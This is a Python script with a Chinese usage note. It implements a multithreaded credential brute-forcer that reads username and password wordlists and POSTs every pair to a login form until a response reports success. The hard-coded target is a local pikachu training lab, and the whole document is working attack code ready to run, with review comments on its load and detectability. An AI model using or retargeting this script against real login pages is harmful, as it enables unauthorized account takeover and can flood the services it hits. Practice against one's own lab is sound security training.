注意:需要在脚本同目录下创建两个字典文件,一个是 users.txt,一个是 passwds.txt(每行一个条目,脚本按 GBK 编码读取);运行该脚本时会从这两个文件内读取用户名与密码。
import os
import threading
import requests
# Number of wordlist entries per block; the username list and the password
# list are each cut into blocks of at most this many lines.
BLOCK_SIZE = 800
def pertition(ls, size):
    """Split *ls* into consecutive slices of at most *size* items.

    The last slice holds whatever is left over, so it may be shorter than
    *size*.  An empty *ls* yields an empty list.
    """
    chunks = []
    for start in range(0, len(ls), size):
        chunks.append(ls[start:start + size])
    return chunks
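# Task object executed by each worker thread.
class ThreadWork:
    """Try every username/password pair from one block of each wordlist.

    The target is hard-coded to the brute-force form of a pikachu training
    lab on 127.0.0.1.  The code sends plain repeated POSTs and handles no
    account lockout, throttling, CAPTCHA or per-request token, so it only
    makes progress against a form that has none of those controls.
    """

    # Login form of the local pikachu lab.
    url = 'http://127.0.0.1/pikachu/vul/burteforce/bf_form.php'
    # Fixed browser-like headers sent with every attempt.
    # NOTE(review): the User-Agent is static and very old, so server-side a
    # burst of POSTs to this path with this exact value is easy to recognise.
    headers = {
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'zh-CN,zh;q=0.8',
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101 Firefox/6.0'
    }
    # Seconds to wait for the server.  requests has no default timeout, so
    # without one a stalled response blocks this thread, and the join() in
    # the caller, forever.
    timeout = 10

    def __init__(self, username, userpwsd):
        """Store the block of usernames and the block of passwords to combine.

        Despite the singular names, both arguments are iterated over in
        start(), so each is expected to be a list of candidates.
        """
        self.username = username
        self.userpwsd = userpwsd

    def run(self, username, userpwsd):
        """Submit one username/password pair to the login form.

        On a response containing 'success' (and not 'exists') the pair is
        printed and the whole process is terminated with os._exit(0).  Any
        other response returns None.  Exceptions raised by requests
        (connection errors, timeouts) are not caught and propagate to the
        caller.
        """
        data = {
            'username': username,
            'password': userpwsd,
            'submit': 'Login'
        }
        # NOTE(review): every candidate password is echoed to stdout, so the
        # wordlist contents end up in terminal scrollback or redirected logs.
        print('username:{}, password:{}'.format(username, userpwsd))
        # POST the form to the pikachu lab.
        response = requests.post(
            self.url, data=data, headers=self.headers, timeout=self.timeout
        )
        body = response.text
        # Outcome is decided by substring match on the page body; presumably
        # the lab's failure text contains 'exists' and its success text
        # contains 'success' - confirm against the lab page.
        if 'exists' in body:
            return
        if 'success' in body:
            # os._exit() skips normal interpreter shutdown and does not flush
            # stdio buffers, so flush explicitly or the result line can be
            # lost when stdout is a pipe or a file.
            print('success!username:{} password:{}'.format(username, userpwsd), flush=True)
            os._exit(0)

    def start(self):
        """Thread entry point: call run() for every pair in this task's blocks."""
        for userItem in self.username:
            for pwsdItem in self.userpwsd:
                self.run(userItem, pwsdItem)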
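# Cut both wordlists into blocks and run one worker thread per block pair.
def BruteForceHttp():
    """Load the two wordlists, split them into blocks and run the workers.

    Reads ./users.txt and ./passwds.txt (GBK-encoded, one entry per line,
    surrounding whitespace stripped), cuts each list into blocks of
    BLOCK_SIZE entries, and creates one ThreadWork thread for every
    (username block, password block) combination.  All threads are started
    together and then joined.

    NOTE(review): the thread count is the product of the two block counts
    and is not capped, so large wordlists start many threads at once against
    the lab server.
    """
    # Read both wordlists; the with-blocks close the files as soon as the
    # lines are in memory instead of leaving the handles to the garbage
    # collector.
    with open('./users.txt', 'r', encoding='gbk') as users_file:
        listusername = [line.strip() for line in users_file]
    blockUsername = pertition(listusername, BLOCK_SIZE)
    with open('./passwds.txt', 'r', encoding='gbk') as passwds_file:
        listuserpasd = [line.strip() for line in passwds_file]
    blockUserpasd = pertition(listuserpasd, BLOCK_SIZE)
    threads = []
    for user in blockUsername:
        for pasd in blockUserpasd:
            # One task per (username block, password block) pair.
            work = ThreadWork(user, pasd)
            # Wrap the task in a thread (a thread, not a process).
            workthread = threading.Thread(target=work.start)
            threads.append(workthread)
    # Start every worker.
    for t in threads:
        t.start()
    # Block until all workers have finished.
    for t in threads:
        t.join()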
# Script entry point: run the lab exercise only when this file is executed
# directly, not when it is imported.
if __name__ == '__main__':
    BruteForceHttp()